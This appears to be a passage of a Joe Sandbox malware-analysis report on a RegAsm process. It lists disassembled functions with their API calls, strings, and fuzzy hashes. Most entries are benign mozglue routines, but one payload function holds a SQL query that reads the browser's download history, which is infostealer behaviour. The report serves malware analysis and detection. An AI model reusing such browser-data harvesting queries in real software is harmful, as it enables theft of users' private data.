Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 145871493-1050664331
Opcode ID: 81849adc90fd0d79aee17b46da76e85cdc68806423095a179b01b60363876b9c
Instruction ID: a3b9dbf3cd5b40127106ad44aa526acb0e7465a9d00b101b4196081d56a2a938
Opcode Fuzzy Hash: 81849adc90fd0d79aee17b46da76e85cdc68806423095a179b01b60363876b9c
Instruction Fuzzy Hash: C2E092B4740301ABDF416FAA884A7067AF8F71A39AF10811DEA25D1741EFB48000AB1A

Function 6C0EC1F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C0EC1DE,?,00000000,?,00000000,?,6C09779F), ref: 6C0EC1F8
GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6C0EC217
FreeLibrary.KERNEL32(?,6C0EC1DE,?,00000000,?,00000000,?,6C09779F), ref: 6C0EC22C

Strings

WinVerifyTrust, xrefs: 6C0EC211
wintrust.dll, xrefs: 6C0EC1F3

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: WinVerifyTrust$wintrust.dll
API String ID: 145871493-2991032369
Opcode ID: e5eaaea4739cc98025dd494c681a9ff018f25b86e9a3a1e641a1da328231b6ac
Instruction ID: eebf91f3ac8431a0a37b3e837925f6ab504486a403762ccd170f33d944264bf0
Opcode Fuzzy Hash: e5eaaea4739cc98025dd494c681a9ff018f25b86e9a3a1e641a1da328231b6ac
Instruction Fuzzy Hash: 8EE0B6743413819FDF00BF66C90DB467FF8BB1A348F10052EAA24D1681EFB58020EB58

Function 6C0EC240 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C0977F6), ref: 6C0EC248
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext), ref: 6C0EC267
FreeLibrary.KERNEL32(?,6C0977F6), ref: 6C0EC27C

Strings

CryptCATAdminAcquireContext, xrefs: 6C0EC261
wintrust.dll, xrefs: 6C0EC243

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext$wintrust.dll
API String ID: 145871493-3357690181
Opcode ID: 3d5781672ebf68719441a47abe09cef7583bc131e9c7ee0c91b6365081891f86
Instruction ID: 1213ee938a8f8a62a58c979b8f2506c318a78968f3b6a2fa658bb8a165b00fba
Opcode Fuzzy Hash: 3d5781672ebf68719441a47abe09cef7583bc131e9c7ee0c91b6365081891f86
Instruction Fuzzy Hash: DFE092753402019BDF086F62A849B427EF8F70B348F60401EEA24D2640EFB18062BF68

Function 6C0EC290 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C0977C5), ref: 6C0EC298
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle), ref: 6C0EC2B7
FreeLibrary.KERNEL32(?,6C0977C5), ref: 6C0EC2CC

Strings

CryptCATAdminCalcHashFromFileHandle, xrefs: 6C0EC2B1
wintrust.dll, xrefs: 6C0EC293

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle$wintrust.dll
API String ID: 145871493-1423897460
Opcode ID: 718d7f85e28bae24dee0ca9a838eb0b7fcf5ba6e933a25e8edf544a76bd32832
Instruction ID: ba4eb108c79d84dc03b0fa0ba88dfd0449badbeac4988c09316ec2ca0fabe842
Opcode Fuzzy Hash: 718d7f85e28bae24dee0ca9a838eb0b7fcf5ba6e933a25e8edf544a76bd32832
Instruction Fuzzy Hash: A1E092743412019FEF00BB6A89097427EF8FB1A348F54041EEA1591A51EFB58028EB58

Function 6C0EBAB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernelbase.dll,?,6C0905BC), ref: 6C0EBAB8
GetProcAddress.KERNEL32(00000000,VirtualAlloc2), ref: 6C0EBAD7
FreeLibrary.KERNEL32(?,6C0905BC), ref: 6C0EBAEC

Strings

kernelbase.dll, xrefs: 6C0EBAB3
VirtualAlloc2, xrefs: 6C0EBAD1

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: VirtualAlloc2$kernelbase.dll
API String ID: 145871493-1188699709
Opcode ID: 8af37ad0a888883cb1b191880ab3c0e1d9be5125e665296120c3073f2cebeb52
Instruction ID: 989d93a6f97e2acf10f59ff5167835a64a30d93f1fdc7ac854e50ea246a32976
Opcode Fuzzy Hash: 8af37ad0a888883cb1b191880ab3c0e1d9be5125e665296120c3073f2cebeb52
Instruction Fuzzy Hash: 3DE0B6703013869BDF009F62C91EB967BF8F70AA48F24402FA91491644EFB88064AB18

Function 004092A7 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 192stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

lstrlenA.KERNEL32(?), ref: 004094AB
lstrlenA.KERNEL32(?), ref: 004094C6

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Strings

SELECT target_path, tab_url from downloads, xrefs: 004093B9
Downloads, xrefs: 004092D1
Downloads, xrefs: 00409328

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
API String ID: 2500673778-2241552939
Opcode ID: 7ced90a649ff221f7bde020ab2f4116feee36ff5ac8d8cfbed5ae13c3b06d1e2
Instruction ID: 7fac0f62cf2577a5a8d57f6ab71485126a571a4460cd7af8d0bbaabf91a59925
Opcode Fuzzy Hash: 7ced90a649ff221f7bde020ab2f4116feee36ff5ac8d8cfbed5ae13c3b06d1e2
Instruction Fuzzy Hash: EA712D71A40119ABCF01FFA6DE469DDB775AF04309F610026F500B70A1DBB8AE898B98

Function 6C0EBE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?,?,6C0EBE49), ref: 6C0EBEC4
RtlCaptureStackBackTrace.NTDLL ref: 6C0EBEDE
memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C0EBE49), ref: 6C0EBF38
RtlReAllocateHeap.NTDLL ref: 6C0EBF83
RtlFreeHeap.NTDLL(6C0EBE49,00000000), ref: 6C0EBFA6

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
String ID:
API String ID: 2764315370-0
Opcode ID: ea513e9c228e4ec9939a65a86e5912adf25334dd9e6f2fab990d723347c7bbdc
Instruction ID: eca5dc85c48927c37abaa4c708b03399d7d218e3164ea0c52025501e12046324
Opcode Fuzzy Hash: ea513e9c228e4ec9939a65a86e5912adf25334dd9e6f2fab990d723347c7bbdc
Instruction Fuzzy Hash: AC519E71A403158FE714CF68CD81BAAB7E2FF88314F294639D916A7B94D730F9068B84

Function 6C0D8E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C0CB58D,?,?,?,?,?,?,?,6C0FD734,?,?,?,6C0FD734), ref: 6C0D8E6E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C0CB58D,?,?,?,?,?,?,?,6C0FD734,?,?,?,6C0FD734), ref: 6C0D8EBF
free.MOZGLUE(?,?,?,?,6C0CB58D,?,?,?,?,?,?,?,6C0FD734,?,?,?), ref: 6C0D8F24
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C0CB58D,?,?,?,?,?,?,?,6C0FD734,?,?,?,6C0FD734), ref: 6C0D8F46
free.MOZGLUE(?,?,?,?,6C0CB58D,?,?,?,?,?,?,?,6C0FD734,?,?,?), ref: 6C0D8F7A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C0CB58D,?,?,?,?,?,?,?,6C0FD734,?,?,?), ref: 6C0D8F8F

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 18b26b36827d07234cc7d30df0d5d97589ff12fa9edca5b5cb975ee36d4ca57b
Instruction ID: 104e1a84c163e38e58f3aaad08eaa8cb99810f7fa920632595d9d23f4b6e2e82
Opcode Fuzzy Hash: 18b26b36827d07234cc7d30df0d5d97589ff12fa9edca5b5cb975ee36d4ca57b
Instruction Fuzzy Hash: 8F5170B5A017268FEB14CF98D88076E73F6BB49318F16062AD516AB740E731F905CBD2

Function 6C0960E0 Relevance: 7.6, APIs: 6, Instructions: 141COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C095FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0960F4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6C095FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C096180
free.MOZGLUE(?,?,?,?,6C095FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C096211
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C095FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C096229
free.MOZGLUE(?,?,?,?,6C095FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C09625E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C095FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C096271

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 3b065dd8a0feedf89648cf0a2dc0ce201508de0824d7d8ce21ffaa2cfd7d8214
Instruction ID: 696fe55536c07cc72ce77a45e6357a9199881943429455b4aa7080bc1439242a
Opcode Fuzzy Hash: 3b065dd8a0feedf89648cf0a2dc0ce201508de0824d7d8ce21ffaa2cfd7d8214
Instruction Fuzzy Hash: DB51AAB0A046068FEB04CFA8D8907AEB7F5EF09308F150539C616D7751EB31EA14DBA2

Function 6C0D27E0 Relevance: 7.6, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C0D2620,?,?,?,6C0C60AA,6C0C5FCB,6C0C79A3), ref: 6C0D284D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C0D2620,?,?,?,6C0C60AA,6C0C5FCB,6C0C79A3), ref: 6C0D289A
free.MOZGLUE(?,?,?,6C0D2620,?,?,?,6C0C60AA,6C0C5FCB,6C0C79A3), ref: 6C0D28F1
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C0D2620,?,?,?,6C0C60AA,6C0C5FCB,6C0C79A3), ref: 6C0D2910
free.MOZGLUE(00000001,?,?,6C0D2620,?,?,?,6C0C60AA,6C0C5FCB,6C0C79A3), ref: 6C0D293C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6C0D2620,?,?,?,6C0C60AA,6C0C5FCB,6C0C79A3), ref: 6C0D294E

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 632b21ddf36595a3c2f0d0f35fb1b6064d0595537e6eeac31ca60f75b60eeb14
Instruction ID: 522df25d7c18a2ce442c8f777690116c5c8a8ef9212b9f402a59fb9fd5e2aa6d
Opcode Fuzzy Hash: 632b21ddf36595a3c2f0d0f35fb1b6064d0595537e6eeac31ca60f75b60eeb14
Instruction Fuzzy Hash: D0418EB5A003068BEB14CF68D88476AB7F6AF49308F260929D556EB740E731F945CB62

Function 6C08CFE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 134memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C10E784), ref: 6C08CFF6
LeaveCriticalSection.KERNEL32(6C10E784), ref: 6C08D026
VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C08D06C
VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C08D139

Strings

MOZ_CRASH(), xrefs: 6C08D187

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalSectionVirtual$AllocEnterFreeLeave
String ID: MOZ_CRASH()
API String ID: 1090480015-2608361144
Opcode ID: b1c38af971dc9604e995701c0ce20764c856fedd96f21c64b01de0e5b69a6442
Instruction ID: bfe83e9302d7cc8b59268fc7b39cc3c4970f7121db656be0de216469c34c8b8b
Opcode Fuzzy Hash: b1c38af971dc9604e995701c0ce20764c856fedd96f21c64b01de0e5b69a6442
Instruction Fuzzy Hash: 2341CD32B023165FCF05CEAD8C947AA76F0EF49715F14423EEA58E7784DBA199009BD0

Function 6C084DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C084E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C084E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C084EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C084F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C084F1E

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: eb3460dbb9f6f90e5a10fa4240b17ce5305d1514f1463b5b337247031fb43955
Instruction ID: 431bb012a4ed1d18db2c05464a9ba56b9e895a72d49e681f75e76a1b3f95605b
Opcode Fuzzy Hash: eb3460dbb9f6f90e5a10fa4240b17ce5305d1514f1463b5b337247031fb43955
Instruction Fuzzy Hash: ED41DF71609701AFCB05CFA9C490A5BBBE8BF89344F10CA2DF86697741DB70E958CB91

Function 6C09C150 Relevance: 7.6, APIs: 5, Instructions: 110stringtimeCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C09C1BC
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C09C1DC

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Now@Stamp@mozilla@@TimeV12@_strlen
String ID:
API String ID: 1885715127-0
Opcode ID: 009a877c371e035c784e868337fdf9e419a326be47a3e697c741e820760223f7
Instruction ID: 5215af668788154637a41e798bb509ea8d44753d070c8a12b1bf145c182ba9d5
Opcode Fuzzy Hash: 009a877c371e035c784e868337fdf9e419a326be47a3e697c741e820760223f7
Instruction Fuzzy Hash: 5D41BFB1D087408FD710DF68C58078AB7E4BF8A708F50856EE9989B712E730E548CB93

Function 6C0EA820 Relevance: 7.6, APIs: 5, Instructions: 106stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C10F770), ref: 6C0EA858
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C0EA87B

Part of subcall function 6C0EA9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6C0EA88F,00000000), ref: 6C0EA9F1

_ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6C0EA8FF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C0EA90C
LeaveCriticalSection.KERNEL32(6C10F770), ref: 6C0EA97E

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
String ID:
API String ID: 1355178011-0
Opcode ID: 52ecef1442231794204f7eb2c9585bb167ea0ff6bde8fa39233f96d8bf1a176e
Instruction ID: cf96b0ee30479480f1500bb7be1757d055727f87e546a7382dd474bd88458f19
Opcode Fuzzy Hash: 52ecef1442231794204f7eb2c9585bb167ea0ff6bde8fa39233f96d8bf1a176e
Instruction Fuzzy Hash: 404193B0E002448FDB00DFA4D845BDEBBB1FF0C324F208619E826AB791D775A945CB91

Function 6C091530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6C09152B,?,?,?,?,6C091248,?), ref: 6C09159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6C09152B,?,?,?,?,6C091248,?), ref: 6C0915BC
moz_xmalloc.MOZGLUE(-00000001,?,6C09152B,?,?,?,?,6C091248,?), ref: 6C0915E7
free.MOZGLUE(?,?,?,?,?,?,6C09152B,?,?,?,?,6C091248,?), ref: 6C091606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C09152B,?,?,?,?,6C091248,?), ref: 6C091637

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: 273b217ffaca85ebb260d7a283e6c0831096ea0ed7af9145be61ee9c2c7f9a1c
Instruction ID: 1a85eee28bdd0d8d37132447eaa74710ffa57078b198a7a55545c00e215f7a07
Opcode Fuzzy Hash: 273b217ffaca85ebb260d7a283e6c0831096ea0ed7af9145be61ee9c2c7f9a1c
Instruction Fuzzy Hash: 3031F472F041049BCB188E78D850B6E73EDBB853647691B2DE823DBBD4EB30E9059791

Function 6C0EAD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C0FE330,?,6C0AC059), ref: 6C0EAD9D

Part of subcall function 6C09CA10: malloc.MOZGLUE(?), ref: 6C09CA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C0FE330,?,6C0AC059), ref: 6C0EADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6C0FE330,?,6C0AC059), ref: 6C0EAE01
GetLastError.KERNEL32(?,00000000,?,?,6C0FE330,?,6C0AC059), ref: 6C0EAE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C0FE330,?,6C0AC059), ref: 6C0EAE3D

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: 3c843e85bdfefdf81fb12fb763cfbc4139646a860654429c943ecaf5c168ac73
Instruction ID: 3ec62bad2b4686d019d4fce287773cf831beba10dd2e570e1ddc85079fee5af4
